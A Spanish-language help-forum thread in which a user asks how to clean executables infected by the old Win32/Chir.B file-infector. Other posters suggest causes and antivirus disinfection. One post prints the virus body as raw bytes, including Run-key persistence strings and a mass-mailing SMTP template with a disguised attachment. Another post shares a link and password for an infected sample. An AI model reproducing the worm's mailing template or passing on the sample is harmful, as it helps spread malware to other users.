Título: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: GenericCharacter en 23 Agosto 2023, 21:53 pm
Buenas tardes. Soy nuevo en este foro, as que no s si es la categora correcta para este hilo.
Mi problema es que hace poco mi pc se infect con un virus el cual daa los archivos .exe de todo el computador. Algunos de estos archivos an se pueden ejecutar (pero ejecutando el virus en segundo plano) mientras que la gran mayora terminaron daados, dando dos errores diferentes.
Una parte de los ejecutables infectados, sueltan un error APPCRASH al abrirlos, y se ejecutan dos veces (a pesar de que los abro una sola vez) mientras que otros sueltan un error que dice "*ruta del archivo* no es una aplicacin Win32 vlida". El objetivo del virus, supongo era ejecutar el archivo original y en segundo plano ejecutar el archivo infectado, quedando en segundo plano para infectar el resto del pc.
Luego, me di cuenta que ejecutaba un archivo al iniciar el pc, llamado "runouce.exe" el cual se encontraba oculto en las carpetas SYSWow64 y System32. De este archivo me encargu, no borrndolo, sino creando un archivo del mismo nombre sin nada de contenido y sobreescribindolo por el virus, para luego, negar todos los permisos posibles de lectura/modificacin (generando as, algn tipo de inmunidad).
Sin embargo, mis archivos afectados seguan daados, y si reinstalaba las aplicaciones afectadas, en el momento que sin querer, ejecutaba algo infectado, el proceso que se quedaba en segundo plano al dar error, volva a infectar mi pc.
Lo ms simple sera formatear, pero debido a la gran cantidad de drivers, juegos y programas (instaladores .exe) afectados, y a lo remoto del sitio donde vivo (que el internet es malsimo) me resultara realmente difcil recuperar todo.
De manera que investigando todava ms, me di cuenta, que al abrir los archivos infectados, haba una parte, que al compararlo con el mismo archivo sano, era nueva, texto o cdigo agregado al final de todas las aplicaciones infectadas, una parte que era comn denominador.
Pens que simplemente con el bloc de notas, la parte que el virus agregaba bastara, pero da error y lanza que "La versin de este archivo no es compatible con la versin de Windows que est ejecutando etc, etc" un error distinto al que el virus agregaba.
Luego prob ejecutar un juego infectado fuera de su carpeta, y para m sorpresa, no ejecutaba el virus, daba un error ya que le faltaban dlls. Es decir, que en realidad, los ejecutables no estn daados, sino que simplemente, el virus fuerza a los programas a cerrar con un error.
En conclusin, y si alguien ha llegado hasta aqu, me gustara saber, as como el virus modific los .exe sin daarlos, el cmo podra quitar la parte del virus y as poder salvar los ejecutables.
Estuve probando el PE Explorer pero en realidad, no s cmo llegar a ese fragmento que el virus genera en todos los .exe.
Investigando un poco ms encontr la siguiente pgina que tiene ms informacin especfica (result ser exactamente el mismo virus): https://www.virusradar.com/en/Win32_Chir.B/description (ftp://https://www.virusradar.com/en/Win32_Chir.B/description)
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: GenericCharacter en 23 Agosto 2023, 21:59 pm
Este sera el texto extrado en todos los .exe afectados: `� t$ � ah.B Y�� � f>MZu�~<�ox�] �3փ�@;�� GetProcAddress ^3ɱ�uڋ]$���C]��ދ��ށ $ ^� V�$� USER32.DLL Ћ� V�$
ADVAPI32.DLL Ћ�� V�$� MPR.DLL Ћ\� V�$� WSOCK32.DLL Ћ|� V� ChineseHacker-2 j j V�V��t�V�j�PV�h�
h` VDY� %
�� ��
B-�a� B;�v� � B-�0� B;�E� h` PVdt\VJ ^; Net Send * My god! Some one killed ChineseHacker-2 Monitor Xj PV�Y� Z� _ � �� &� FDf� � PTj PPj j VtX h` PVdPj SVxXt�V� ^YM� YA� � T� j�WVpt�� j j SV<Sc� j�WV(PT. SOFTWARE\Microsoft\Windows\CurrentVersion\Run h� [� Runonce Yh � Pj�j QS _ � � � ]� PTj SPj j VtX3 � T
� _FP{� Fd� F�� FH�toj�j Ћ �Z<�ڋ�� kT+́ � rH�ꍗr� jNURd� MNh � QRP� VLPTj PUj j V\ Xh� VDj j PTP j h�� VP�toj@h � h � j SVh�tK荗r� PTjNRUSVTXNu,ԍMNPTh � RQSVTVLTj PUj j SVX XSV`h� VDX� GetSystemTime � GetComputerNameA � WideCharToMultiByte � TerminateThread
CreateThread � _lcreat � GetSystemDirectoryA � VirtualAllocEx � WaitForSingleObject � CloseHandle � CreateKernelThread � CreateRemoteThread � WriteProcessMemory � OpenProcess � GetCurrentProcessId � RegisterServiceProcess � Sleep � _lclose � _llseek � _lwrite � _lread � _lopen � SetFileTime � SetFileAttributesA
FindClose � FindNextFileA � FindFirstFileA � SetCurrentDirectoryA � GetDriveTypeA � WinExec � GetCommandLineA
GetLastError
CreateMutexA
LoadLibraryA +�X
wsprintfA
SendMessageA
GetWindow � MessageBoxA � FindWindowA � GetWindowThreadProcessId +�X� RegNotifyChangeKeyValue � RegQueryValueExA � RegSetValueExA � RegOpenKeyA +�X� WNetCloseEnum � WNetEnumResourceA � WNetOpenEnumA +�X� recv � closesocket � socket � connect � gethostbyname � htons � send � WSACleanup � WSAStartup +�X� ǹ־! � ȥķֹ! � а,пѧ! � ! � Ӣΰ! � Ȩ! � Ҫƽ! � ! + `}�h � WVl�
\runouce.exe ^� a� � C:\ QRTV��r��t�T ZBY38 ) � � G�P Wj� Wj�� Wj�� Wj�� `PTu�u�j�j� [�u6 � j�h � TRPS YY�u�U�S � a� `E�
=winntv=windtou�V��teu�c � �$*.* TPV�t1TSV �t$T$,�$�t��<.tRT@ SV$�$.. TV� � a� `� a� Y
) u�� `� a� Y
� u��� �a Z� �a Z E�@8 u@
� j
VD� � Tj WV0t@ظ � PPW X� .eml@� j WVpt�WSj � WV@SV@ � � }�_,S`=.wabt!=.adct%=r.dbt�=.doct�=.xlst�� S� � S�� � T fD$� � f=� u�j�SV0t�h4� TSV8SV@� }�_,S=.exetS=.scrtL=.htmt�=htmlt�� j SV(j�SV0t�S\ G�O�W�RQPSV,SV@_,7SV(� j SV(j�SV0t�S�� G�O�W�RQPSV,SV@_,7SV(� ` � TIj PV0 � � � readme.eml Xj PVp� WSj �� WV@}�j�j WV<x
<html><script language="javascript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> XjxPWV8SV@a� ` � h � Wu�V4�G<�;� f?PE� �O�I(;� G(+C�r#�C�j Pu�V<Pj�Pu�V4Xf=`� K$ j�j u�V<tpP�� +C�C�S�;r�C�O8I��##+�GPY+K��K�O(�O4 _#� ��h� Wu�V8t�j j u�V<h � Pu�V8 � a� ` � TOj WV0t�Su�� SV@ � a� `j u�V0� � 3RPj�PSV4YZ�t[ă ;w@tE.t<0r�9r8Ar�~r.3�u�r+�r�$<@t<.tTH�ƊSV@ � a� `j u�V0tp � h � WSV4= � uKG`j PSV<Od � w6QjDWSV4 � j j h � PjWh � j V|T � Yʁ � SV@a� � `e � u�W
� PWu�V8 � �$ � �$ � �$h 0 Wu�V4tHԁ � �$ � �$ � �$ � �$WPR�� PWu�V8�$
j�Wu�V8ea� � � `eE � Th�� ��I� j j�j� �.� f�� j� fG�� btamail.net.cn �� @� G�j�WS � u�W j PWS h � VD � �$ � �$ � �$h 0 Wu�V4� � �$ � �$ � �$ � �$RPW� j PWS h � VD�
.
Xj j�PS h � VD� QUIT
Xj j�PS h � VDE� S eaE� � ` � +PTR X�� HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
DATA
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID
XWu�Wu�Pu� E � aE� � `E A ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ^}�U��33� Su�0 Jt
C��EI��E�M=2aE� QRVu�M����р��
^ZY� XQ� :dg6 dg& � 2"X� "�dg� YY� ( Z � YE� 3� g� MZP �� �� �� � � �@ �� "� �� ��� !�L!This program must be run under Win32
$7 PE �L�� �, � ����� �� �� �� �� � �@ �� �� �� �� �
�P �� �� �� � �� �� �� �0 �N �@ �� SCODE �� �� �� �� � �`DATA �� � �� �� �@ �.idata �� �0 �� �
�@ �.reloc �� �@ �� �� �@ �P k%00@ (0
80 �00 �F0 �F0 �KERNEL32.dll �Sleep � �� ��0 _�G
t
Pj�PSV8X��G�QPj�PSV8XY � 3f
� f���B
u Ϣ � HwXj ��tW� 'IwXj�S��tB� `Hw_ � Th � j
S� � �u�Th � j�S�F�u
� � � FYwXh� �Q ]� � � Runonce ^h � � #H(vXTWj j VS�X� 'vXj j j�j S�� �(vXh � Wj�j VS� � V�vXu�j h�� ��t,� 6�vXjS� Y�� )2vXj�Q�� `P��L$X��P�� `�P�af f@�u�}�M�a� `E�j PPj a�
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: crazykenny en 23 Agosto 2023, 22:11 pm
Buenas tardes. Soy nuevo en este foro, as que no s si es la categora correcta para este hilo.
Mi problema es que hace poco mi pc se infect con un virus el cual daa los archivos .exe de todo el computador. Algunos de estos archivos an se pueden ejecutar (pero ejecutando el virus en segundo plano) mientras que la gran mayora terminaron daados, dando dos errores diferentes.
Una parte de los ejecutables infectados, sueltan un error APPCRASH al abrirlos, y se ejecutan dos veces (a pesar de que los abro una sola vez) mientras que otros sueltan un error que dice "*ruta del archivo* no es una aplicacin Win32 vlida". El objetivo del virus, supongo era ejecutar el archivo original y en segundo plano ejecutar el archivo infectado, quedando en segundo plano para infectar el resto del pc.
Luego, me di cuenta que ejecutaba un archivo al iniciar el pc, llamado "runouce.exe" el cual se encontraba oculto en las carpetas SYSWow64 y System32. De este archivo me encargu, no borrndolo, sino creando un archivo del mismo nombre sin nada de contenido y sobreescribindolo por el virus, para luego, negar todos los permisos posibles de lectura/modificacin (generando as, algn tipo de inmunidad).
Sin embargo, mis archivos afectados seguan daados, y si reinstalaba las aplicaciones afectadas, en el momento que sin querer, ejecutaba algo infectado, el proceso que se quedaba en segundo plano al dar error, volva a infectar mi pc.
Lo ms simple sera formatear, pero debido a la gran cantidad de drivers, juegos y programas (instaladores .exe) afectados, y a lo remoto del sitio donde vivo (que el internet es malsimo) me resultara realmente difcil recuperar todo.
De manera que investigando todava ms, me di cuenta, que al abrir los archivos infectados, haba una parte, que al compararlo con el mismo archivo sano, era nueva, texto o cdigo agregado al final de todas las aplicaciones infectadas, una parte que era comn denominador.
Pens que simplemente con el bloc de notas, la parte que el virus agregaba bastara, pero da error y lanza que "La versin de este archivo no es compatible con la versin de Windows que est ejecutando etc, etc" un error distinto al que el virus agregaba.
Luego prob ejecutar un juego infectado fuera de su carpeta, y para m sorpresa, no ejecutaba el virus, daba un error ya que le faltaban dlls. Es decir, que en realidad, los ejecutables no estn daados, sino que simplemente, el virus fuerza a los programas a cerrar con un error.
En conclusin, y si alguien ha llegado hasta aqu, me gustara saber, as como el virus modific los .exe sin daarlos, el cmo podra quitar la parte del virus y as poder salvar los ejecutables.
Estuve probando el PE Explorer pero en realidad, no s cmo llegar a ese fragmento que el virus genera en todos los .exe.
Hola, GenericCharacter. Has considerado la opcion de que el virus haya corrompido tu S.O. en lugar de archivos .exe y que, ademas, este forzando el error que comentas cuando intentas ejecutar aplicaciones .exe?. Y, bueno, aunque no tengo demasiada experiencia en el tema, lo comento como una sugerencia y porque es otra posibilidad que podrias revisar para, quizas, obtener mas informacin y intentar solucionar el problema. Lamento no poder ser de mas ayuda con respecto a la duda que has expuesto en este tema,,. Muchas gracias por vuestra atencion, y, bueno, saludos.,...
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: GenericCharacter en 23 Agosto 2023, 22:20 pm
Descuida, cualquier comentario o ayuda es bien recibido.
Y sobre si es un problema de S.O, pues no lo creo (al menos desde mi punto de vista, ya que no s mucho sobre cmo funcionan los virus) pero al menos, an hay programas que funcionan e incluso juegos (muy pocos, apenas 3 juegos de los 15 que tena) pero analizando bien sus ejecutables, al parecer estaban infectados con otro virus diferente, virus que nunca le prest atencin porque no provocaba nada ni ejecutaba nada, solo crea un archivo instalador con el mismo nombre con "mgr" aadido al final, y pues ya. Pero justos estos tres juegos tienen ese detalle, y son justo los que se salvaron.
Tambin de la misma manera, las aplicaciones base del Windows, como el Media Player, Internet Explorer, bloc de notas y demses, an funcionan, osea, que nada en la carpeta de Windows fue realmente afectada (eso creo), solo las de archivos de programa y resto del pc.
Y gracias por tomarte la molestia de leer tan largo post, jaja.
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: **Aincrad** en 23 Agosto 2023, 22:58 pm
sube alguna muestra, osea busca algun programa (que no pese mucho) que este infectado , lo comprimes con contrasea y lo subes a mediafire o mega.
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: GenericCharacter en 27 Agosto 2023, 18:56 pm
sube alguna muestra, osea busca algun programa (que no pese mucho) que este infectado , lo comprimes con contrasea y lo subes a mediafire o mega.
Disculpa la tardanza no tena internet xd. Aqu est el enlace a un comprimido en mediafire: https://www.mediafire.com/file/0s08c8q19etltyp/VirusRunouce_%2528Infected%2526Original%2529.rar/file (ftp://https://www.mediafire.com/file/0s08c8q19etltyp/VirusRunouce_%2528Infected%2526Original%2529.rar/file) La contrasea es: 123456789 (si, es muy complicada) El comprimido contiene dos archivos, uno infectado y el otro no (para comparar su funcin original). El archivo infectado tiene en el nombre "(Infected)"
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: EdePC en 28 Agosto 2023, 15:18 pm
Ese es un bicho bastante viejo y muy bien conocido. Cualquier antivirus decente incluyendo a Windows Defender suelen tener opciones como acciones que pueden realizar al encontrar malware:
1. Eliminar, simplemente elimina os archivos infectados
2. Poner en cuarentena, mueve el archivo infectado a una carpeta especial bajo el control del antivirus para mantenerlo ah aislado por si el Usuario considera que es un archivo limpio (falso positivo) o desea mantener el archivo hasta encontrar otra solucin
3. Desinfectar, cuando el antivirus conoce muy bien el tipo de infeccin y es capaz de remover la infeccin de un archivo para que se pueda seguir utilizando sin peligro, raras veces queda inutilizable, til cuando no hay manera de encontrar un archivo original y limpio.
(https://i.ibb.co/Qb30YKY/desinfectado.png)
Ah se puede ver que lo desinfect, y por el anlisis que le pude realizar si lo deja prcticamente igual al original
Es raro infectarse con ese tipo de bichos tan antiguos y conocidos salvo que no tengas antivirus o lo hayas deshabilitado intencionalmente. Hacer la limpieza manualmente (sin antivirus) puede llegar a ser complejo dependiendo del malware porque podra no ser igual en los archivos infectados o tener ms de una infeccin.
Título: Re: Modificar un archivo .exe para extraer algn virus y salvar el ejecutable
Publicado por: GenericCharacter en 30 Agosto 2023, 01:16 am
Es raro infectarse con ese tipo de bichos tan antiguos y conocidos salvo que no tengas antivirus o lo hayas deshabilitado intencionalmente. Hacer la limpieza manualmente (sin antivirus) puede llegar a ser complejo dependiendo del malware porque podra no ser igual en los archivos infectados o tener ms de una infeccin.
Ciertamente, yo tengo el Windows Defender desactivado y no tengo ningn antivirus instalado. Lo dejo as porque veo que consumen demasiados recursos de mi PC (que es bastante antigua y apenas tiene 2gb de RAM), y aunque si la escaneo peridicamente con AntiMalware Bytes, desconoca que el Defender poda restaurar los archivos. Muchas gracias por la ayuda, tratar de recuperarlos con algn antivirus y si no, pues tocar eliminarlos. Saludos!
|